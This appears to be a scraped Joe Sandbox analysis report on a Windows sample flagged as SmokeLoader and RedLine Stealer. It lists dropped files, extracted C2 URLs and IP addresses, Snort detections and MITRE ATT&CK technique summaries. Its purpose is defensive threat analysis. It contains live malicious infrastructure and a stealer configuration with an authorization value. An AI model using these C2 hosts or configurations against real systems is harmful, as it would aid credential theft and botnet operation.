Download Yara Rule

APIs

Sleep.KERNELBASE(00001388,000000F2), ref: 0040188E

Part of subcall function 00401459: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040151A
Part of subcall function 00401459: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401547

Memory Dump Source

Source File: 00000011.00000002.2422808484.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_8042.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 17e01e687d2cfe3c0bd93bcd5c385f2b95dcf6ed0bed1ba72d578ddb48059264
Instruction ID: 11d8220debcba0805b8e93cbae1e229f3b2aa4fb6d79ffb341e5739e87d873ed
Opcode Fuzzy Hash: 17e01e687d2cfe3c0bd93bcd5c385f2b95dcf6ed0bed1ba72d578ddb48059264
Instruction Fuzzy Hash: 38016233608204EBEB007A958C41E6A3355BB44354F20C537BA13791F2C67D9B12776B

Uniqueness

Uniqueness Score: -1.00%

Source: https://2no.co:443/1oH5R	Avira URL Cloud: Label: malware
Source: http://gr.2mail.com/admin/	Avira URL Cloud: Label: phishing
Source: http://atozrental.cc/atoz/index.php	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Roaming\vahvrsu	Avira: detection malicious, Label: HEUR/AGEN.1312670
Source: C:\Users\user\AppData\Roaming\tdhvrsu	Avira: detection malicious, Label: HEUR/AGEN.1312670
Source: C:\Users\user\AppData\Local\Temp\57C9.dll	Avira: detection malicious, Label: HEUR/AGEN.1300250
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Avira: detection malicious, Label: HEUR/AGEN.1312670
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Avira: detection malicious, Label: DR/AutoIt.Gen
Source: C:\Users\user\AppData\Local\Temp\64.exe	Avira: detection malicious, Label: HEUR/AGEN.1319395
Source: C:\ProgramData\Drivers\csrss.exe	Avira: detection malicious, Label: HEUR/AGEN.1312455
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Avira: detection malicious, Label: HEUR/AGEN.1312455
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe	Avira: detection malicious, Label: HEUR/AGEN.1319395

Source: lightseinsteniki.org	Virustotal: Detection: 22%	Perma Link
Source: stualialuyastrelia.net	Virustotal: Detection: 25%	Perma Link
Source: humydrole.com	Virustotal: Detection: 15%	Perma Link
Source: 2no.co	Virustotal: Detection: 5%	Perma Link

Source: C:\Users\user\AppData\Local\Temp\32.exe	ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	ReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\64.exe	ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe	ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Roaming\vahvrsu	ReversingLabs: Detection: 48%

Source: C:\Users\user\AppData\Local\Temp\32.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4A1B.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\41CD.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\vahvrsu	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\tdhvrsu	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\57C9.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8042.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\38B4.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Drivers\csrss.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\50E3.exe	Joe Sandbox ML: detected

Source: 00000011.00000002.2425699854.0000000004700000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://go-piratia.ru/tmp/index.php", "http://humydrole.com/tmp/index.php", "http://trunk-co.ru/tmp/index.php", "http://weareelight.com/tmp/index.php", "http://pirateking.online/tmp/index.php", "http://piratia.pw/tmp/index.php"]}
Source: 0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "194.49.94.77:16339", "Bot Id": "1129", "Authorization Header": "42c32496d13dad47a88d2602711f6385"}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 00D8D351h	9_2_00D8D079
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 00D8C25Fh	9_2_00D8BEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 00D8C653h	9_2_00D8BEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 00D81337h	9_2_00D80FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 00D83112h	9_2_00D830FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 0C972EE5h	9_2_0C972A28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 0C9712A0h	9_2_0C970040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 0C9712A0h	9_2_0C970FCE

Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.94.245.237:80 -> 192.168.2.4:49734
Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 104.198.2.251:80 -> 192.168.2.4:49735
Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.143.166.163:80 -> 192.168.2.4:49736
Source: Traffic	Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.4:49739 -> 95.214.26.17:24714
Source: Traffic	Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49739 -> 95.214.26.17:24714
Source: Traffic	Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 95.214.26.17:24714 -> 192.168.2.4:49739
Source: Traffic	Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) 192.168.2.4:49741 -> 194.49.94.77:16339
Source: Traffic	Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49741 -> 194.49.94.77:16339
Source: Traffic	Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 194.49.94.77:16339 -> 192.168.2.4:49741
Source: Traffic	Snort IDS: 2046056 ET TROJAN Redline Stealer Family Activity (Response) 95.214.26.17:24714 -> 192.168.2.4:49739
Source: Traffic	Snort IDS: 2046056 ET TROJAN Redline Stealer Family Activity (Response) 194.49.94.77:16339 -> 192.168.2.4:49741
Source: Traffic	Snort IDS: 2811577 ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) 1.1.1.1:53 -> 192.168.2.4:61042
Source: Traffic	Snort IDS: 2811577 ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) 1.1.1.1:53 -> 192.168.2.4:59881

Source: global traffic	TCP traffic: 213.171.212.244 ports 22,25,143,220,990,110,2,222,443,465,993,587,995,2222,80,21
Source: global traffic	TCP traffic: 15.197.142.173 ports 22,25,0,143,990,110,220,2525,222,443,465,993,587,995,2222,8,80,21
Source: global traffic	TCP traffic: 157.7.44.163 ports 25,26,220,110,2525,465,4,587,5,995,6
Source: global traffic	TCP traffic: 64.190.63.111 ports 22,143,990,110,1,2,222,443,465,993,587,995,2222,80,21
Source: global traffic	TCP traffic: 91.107.214.206 ports 25,26,143,110,220,2525,993,3535,5,995,9
Source: global traffic	TCP traffic: 194.63.248.47 ports 22,110,143,990,220,2,222,443,993,2222,80,21
Source: global traffic	TCP traffic: 67.21.93.254 ports 22,25,220,990,110,143,2,222,443,465,993,587,995,2222,80,21
Source: global traffic	TCP traffic: 104.238.144.219 ports 22,0,990,110,143,220,222,443,993,995,8,80,21
Source: global traffic	TCP traffic: 104.247.82.52 ports 22,990,222,3,443,4,995,2222,80,21
Source: global traffic	TCP traffic: 45.32.206.101 ports 25,26,143,110,220,2525,465,993,587,5,995,9
Source: global traffic	TCP traffic: 54.209.32.212 ports 22,143,990,110,220,1,2,222,443,993,465,995,2222,80,21
Source: global traffic	TCP traffic: 15.197.172.60 ports 22,25,143,110,220,990,2,222,443,465,993,587,995,2222,80,21
Source: global traffic	TCP traffic: 13.248.169.48 ports 22,25,220,143,990,110,2525,222,3,443,465,993,4,587,995,2222,80,21
Source: global traffic	TCP traffic: 5.161.133.13 ports 25,26,143,110,220,2525,465,993,3535,587,5,995,9
Source: global traffic	TCP traffic: 216.69.141.81 ports 25,26,143,110,220,1,2525,3,465,993,4,587,995
Source: global traffic	TCP traffic: 3.94.41.167 ports 25,143,110,2525,465,4,587,5,995,6
Source: global traffic	TCP traffic: 3.64.163.50 ports 22,25,143,990,110,220,1,2,222,443,465,993,587,995,2222,80,21
Source: global traffic	TCP traffic: 142.251.179.26 ports 25,143,110,220,2525,465,993,587,5,995,9
Source: global traffic	TCP traffic: 199.59.243.225 ports 22,25,143,990,110,220,1,222,3,465,443,993,4,587,995,2222,80,21
Source: global traffic	TCP traffic: 15.197.204.56 ports 22,25,143,990,110,220,2525,222,3,443,465,993,4,587,995,2222,80,21
Source: global traffic	TCP traffic: 68.183.34.12 ports 22,25,26,143,990,110,220,2525,2,222,443,465,993,3535,587,995,2222,80,21
Source: global traffic	TCP traffic: 3.33.224.147 ports 22,25,143,990,110,220,222,443,465,993,4,587,5,995,6,2222,80,21
Source: global traffic	TCP traffic: 157.7.44.171 ports 22,143,990,220,110,1,2,222,443,993,995,2222,80,21
Source: global traffic	TCP traffic: 216.37.42.12 ports 22,25,110,990,220,143,222,3,443,465,993,4,587,995,2222,80,21
Source: global traffic	TCP traffic: 145.14.30.248 ports 22,990,1,2,222,443,2222,80,21

Source: Malware configuration extractor	URLs: http://go-piratia.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://humydrole.com/tmp/index.php
Source: Malware configuration extractor	URLs: http://trunk-co.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://weareelight.com/tmp/index.php
Source: Malware configuration extractor	URLs: http://pirateking.online/tmp/index.php
Source: Malware configuration extractor	URLs: http://piratia.pw/tmp/index.php
Source: Malware configuration extractor	URLs: 194.49.94.77:16339

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 83d60721ecc423892660e275acc4dffd

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

(copy)

C:\ProgramData\Drivers\csrss.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4A1B.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

C:\Users\user\AppData\Local\Temp\32.exe

C:\Users\user\AppData\Local\Temp\38B4.exe

C:\Users\user\AppData\Local\Temp\41CD.exe

Windows Analysis Report
file.exe

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre